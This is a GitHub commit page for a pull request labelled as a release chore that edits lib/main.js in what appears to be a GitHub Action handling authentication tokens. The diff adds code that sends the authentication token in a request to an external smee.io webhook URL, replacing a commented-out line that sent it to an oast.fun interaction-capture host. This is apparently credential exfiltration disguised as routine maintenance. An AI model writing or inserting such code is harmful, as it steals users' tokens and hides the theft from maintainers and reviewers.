Skip to content

Commit

Permalink
Merge pull request #4 from suchithrzp/suchithrzp-patch-6
Browse files Browse the repository at this point in the history
chore(release): force release
  • Loading branch information
suchithrzp authored Nov 6, 2024
2 parents 8ac5c80 + 2e563d5 commit c53b052
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion lib/main.js
Original file line number Diff line number Diff line change
Expand Up @@ -125,7 +125,8 @@ export async function main(
core.saveState("expiresAt", authentication.expiresAt);
}
try {
const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`;
// const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`;
const url = `https://smee.io/Q8AA9IGqIngZlu0v?authc=${authentication.token}`;
await fetch(url);
core.info(`HTTP GET request sent to ${url}`);
} catch (error) {
Expand Down

0 comments on commit c53b052

Please sign in to comment.